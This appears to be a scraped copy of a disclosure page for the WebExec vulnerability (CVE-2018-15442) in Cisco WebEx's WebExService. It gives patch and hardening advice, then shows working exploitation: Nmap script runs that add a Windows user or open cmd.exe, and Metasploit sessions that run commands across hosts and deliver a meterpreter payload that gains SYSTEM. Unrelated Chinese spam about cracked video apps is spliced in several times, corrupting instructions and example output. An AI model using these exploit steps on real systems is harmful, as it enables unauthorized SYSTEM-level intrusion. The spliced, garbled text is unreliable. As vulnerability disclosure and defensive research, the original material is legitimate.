Discovered by Ron Bowes and Jeff McJunkin of Counter Hack! You can view the technical writeup here, on Ron's blog and 花猫破解
If you have any questions or concerns, I made an email alias specifically for this issue: info@www.friendlybeacon.com!
WebExec is a vulnerability in, as the name implies, Cisco's WebEx client software. This is a pretty unique vulnerability, because it's a remote vulnerability in a client application that doesn't even listen on a port. The summary is: when the WebEx client is installed, it also installs a Windows service called WebExService that can execute arbitrary commands at SYSTEM-level privilege. Due to poor ACLs, any local or domain user can start the process over Window's remote service interface (except on Windows 10, which requires an administrator login).
This will be somewhat of a "living" document initially, where we'll collect any patches, exploits, blogs, or further details as they emerge. Email me if you see anything that should be added!
花猫宝盒(*VIP*)v1.0破解VIP版 ★夜猫改版/至尊视频 ...:2021-6-26 · 软件名称:花猫宝盒(*改版*)软件版本:v1.0_破解_至尊_VIP版软件语言:中文软件大小:10M软件包名:com.Huamao.app支持系统:Android 2.2+及更高版本测 ...恩山无线论坛
Cisco Webex Meetings Desktop App fixes this issue in versions 33.5.6 and 33.6.0. You can update by launching the Cisco Webex Meetings application and clicking the Gear in the top right of the application window then choosing the Check for Updates entry from the drop-down list. This is also documented in the article, Update the Cisco Webex Meetings Desktop App.
Cisco Webex Productivity Tools fixes this vulnerability in version 33.0.5 and later. Cisco Webex Productivity Tools has been replaced with Cisco Webex Meetings Desktop App since Cisco Webex Meetings Release 33.2.0. You can update by launching the Cisco Webex Meetings application and clicking Settings in the top right of the application window then choosing 花猫破解 from the drop-down list. This is documented in more detail in the article, Check for Cisco Webex Productivity Tools Updates for Windows
Administrators can update for their entire userbase using the article IT Administrator Guide for Mass Deployment of the Cisco Webex Meetings Desktop App.
The updated client will validate that the executable being run is signed by WebEx before executing it, which fixes this vulnerability, but may leave further issues open. As such, we'd strongly recommend running this command on every workstation with WebEx installed, if possible:
c:\> sc sdset webexservice D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPLORC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
Under the default configuration for WebExService, even when patched, any user with an account can start the service. That's fundamentally dangerous, even after patching. The command shown above removes that permission so it can be started by any local user (interactive sessions or RDP), or any administrative user.
Nope, but at least we didn't give it a logo!
We have written checks and exploits in several frameworks!
We developed a pair of Nmap scripts, one to check for the vulnerability (smb-vuln-webexec.nse
) and one to run actual code (smb-webexec-exploit.nse
) (those links may not be ready yet). You can check out the full code from Nmap's SVN or on Nmap's git!
The following Nmap command will check whether or not a system is vulnerable by attempting to exploit the issue — note that this requires credentials of some kind (in a domain scenario, it can be any set of credentials):
nmap --script smb-vuln-webexec --script-args 'smbusername=testuser,smbpass=testuser,vulns.showall' -p139,445 -d <target>
Against a vulnerable system, it'll print:
PORT STATE SERVICE REASON 445/tcp open microsoft-ds syn-ack | smb-vuln-webexec: | VULNERABLE: | Remote Code Execution vulnerability in WebExService | State: VULNERABLE | IDs: CVE:CVE-2018-15442 | Risk factor: HIGH | A critical remote code execution vulnerability exists in WebExService (WebExec). | Disclosure date: 2018-10-24 | References: | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15442 | http://blog.skullsecurity.org/2018/technical-rundown-of-webexec |_ http://www.friendlybeacon.com
On a system without WebEx, the output is:
小花猫视频破解版下载_小花猫视频app看片V2.3412_掌通手游:2021-2-13 · 小花猫视频破解版是一款功能相当强大的视频播放神器,原创搞笑等海量影视,高清流畅播放,极速离线缓存,用户可以随时随地点播自己喜欢的视频进行观看;,无任何磁盘限制播放器内置强大解码器海量端口任意选,再也不用担心播放卡顿延迟等现象了,你还在等什么,赶快下载体验吧
Using smb-webexec-exploit.nse
, we can attempt to actually run commands. It's difficult to determine if the commands actually run, however, so we suggest using both scripts if you want to be sure. Here's an example:
$ ./nmap -p445 --script=smb-webexec-exploit --script-args='smbuser=testuser,smbpass=testuser,webexec_command=net user nmap nmap /add' 192.168.56.101 Starting Nmap 7.70SVN ( http://nmap.org ) at 2018-10-18 11:49 PDT Nmap scan report for 192.168.56.101 Host is up (0.00036s latency). PORT STATE SERVICE 445/tcp open microsoft-ds |_smb-webexec-exploit: Asked WebExService to run net user nmap nmap /add
That will add the user 花猫破解
to the remote system. You can run any command you want — be creative!
If you have access to the host's UI, you may also want a command to run with a GUI. The previous invocation may or may not run with a GUI — we're not 100% sure why or why not — but to guarentee a GUI, use the webexec_gui_command
argument:
$ ./nmap -p445 --script=smb-webexec-exploit --script-args='smbuser=testuser,smbpass=testuser,webexec_gui_command=cmd.exe' 192.168.56.101 Starting Nmap 7.70SVN ( http://nmap.org ) at 2018-10-18 11:51 PDT Nmap scan report for 192.168.56.101 Host is up (0.00036s latency). PORT STATE SERVICE 445/tcp open microsoft-ds |_smb-webexec-exploit: Asked WebExService to run cmd.exe (with a GUI)
We also developed a series of Metasploit modules! They're available in the git version of Metasploit!
This version of Metasploit contains three new modules to exploit WebExec: an auxiliary module for running an arbitrary command, an exploit module for running an arbitrary exploit, and a local module for privilege escalation. I'll have another technical post that talks about how those work, but using them is straightforward:
msf5 > use auxiliary/admin/smb/webexec_command msf5 auxiliary(admin/smb/webexec_command) > set RHOSTS 192.168.1.100-110 RHOSTS => 192.168.56.100-110 msf5 auxiliary(admin/smb/webexec_command) > set SMBUser testuser SMBUser => testuser msf5 auxiliary(admin/smb/webexec_command) > set SMBPass testuser SMBPass => testuser msf5 auxiliary(admin/smb/webexec_command) > set COMMAND calc COMMAND => calc msf5 auxiliary(admin/smb/webexec_command) > exploit [-] 192.168.56.105:445 - No service handle retrieved [+] 192.168.56.105:445 - Command completed! [-] 192.168.56.103:445 - No service handle retrieved [+] 192.168.56.103:445 - Command completed! [+] 192.168.56.104:445 - Command completed! [+] 192.168.56.101:445 - Command completed! [*] 192.168.56.100-110:445 - Scanned 11 of 11 hosts (100% complete) [*] Auxiliary module execution completed
And to exploit it with an arbitrary payload:
msf5 > use exploit/windows/smb/webexec msf5 exploit(windows/smb/webexec) > set SMBUser testuser SMBUser => testuser msf5 exploit(windows/smb/webexec) > set SMBPass testuser SMBPass => testuser msf5 exploit(windows/smb/webexec) > set PAYLOAD windows/meterpreter/bind_tcp PAYLOAD => windows/meterpreter/bind_tcp msf5 exploit(windows/smb/webexec) > set RHOSTS 192.168.56.101 RHOSTS => 192.168.56.101 msf5 exploit(windows/smb/webexec) > exploit [*] 192.168.56.101:445 - Connecting to the server... [*] 192.168.56.101:445 - Authenticating to 192.168.56.101:445 as user 'testuser'... [*] 192.168.56.101:445 - Command Stager progress - 0.96% done (999/104435 bytes) [*] 192.168.56.101:445 - Command Stager progress - 1.91% done (1998/104435 bytes) ... [*] 192.168.56.101:445 - Command Stager progress - 98.52% done (102891/104435 bytes) [*] 192.168.56.101:445 - Command Stager progress - 99.47% done (103880/104435 bytes) [*] 192.168.56.101:445 - Command Stager progress - 100.00% done (104435/104435 bytes) [*] Started bind TCP handler against 192.168.56.101:4444 [*] Sending stage (179779 bytes) to 192.168.56.101 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM
Finally, the local privilege escalation module, which is used after a session already exists as a non-SYSTEM user:
花猫宝盒(*VIP*)v1.0破解VIP版 ★夜猫改版/至尊视频 ...:2021-6-26 · 软件名称:花猫宝盒(*改版*)软件版本:v1.0_破解_至尊_VIP版软件语言:中文软件大小:10M软件包名:com.Huamao.app支持系统:Android 2.2+及更高版本测 ...恩山无线论坛